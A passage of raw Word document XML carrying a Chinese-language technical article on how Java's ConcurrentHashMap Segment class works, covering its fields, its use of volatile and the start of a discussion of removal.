          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法。</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每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>相当于一个子</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表，它的数据成员如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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static</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final</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Segment&lt;K,V&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> ReentrantLock </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Serializable {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>private</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static</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final</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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> serialVersionUID = 2249069246763182397L;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * The number of elements in this segment's region.</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         */</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transient</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volatile</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> count;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * Number of updates that alter the size of the table. This is</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>         * used during bulk-read methods to make sure they see a</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * consistent snapshot: If modCounts change during a traversal</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * of segments computing size or checking containsValue, then</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * we might have an inconsistent view of state so (usually)</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * must retry.</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         */</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transient</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> modCount;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * The table is rehashed when its size exceeds this threshold.</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * (The value of this field is always &lt;tt&gt;(int)(capacity *</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * loadFactor)&lt;/tt&gt;.)</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         */</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transient</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> threshold;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * The per-segment table.</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         */</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transient</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volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> HashEntry&lt;K,V&gt;[] table;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * The load factor for the hash table.  Even though this value</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * is same for all segments, it is replicated to avoid needing</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * links to outer object.</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         * @serial</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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>         */</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final</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float</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> loadFactor;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>用来统计该段数据的个数，它是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，它用来协调修改和读取操作，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>以保证读取操作能够读取到几乎最新的修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。协调方式是这样的，每次修改操作做了结构上的改变，如增加</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>删除节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>修改节点的值不算结构上的改变</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，都要写</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值，每次读取操作开始都要读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的值。</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>这利用了</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Java 5</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中对</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>语义的增强，对同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量的写和读存在</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>happens-before</w:t>
      </w:r>
      <w:r w:rsidRPr="0098262E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>关系</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>统计段结构改变的次数，主要是为了检测对多个段进行遍历过程中某个段是否发生改变，在讲述跨段操作时会还会详述。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>threashold</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>用来表示需要进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rehash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的界限值。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>数组存储段中节点，每个数组元素是个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链，用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>也是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这使得能够读取到最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值而不需要同步。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>loadFactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表示负载因子。</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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实现细节</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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>修改操作</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先来看下删除操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>remove(key)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
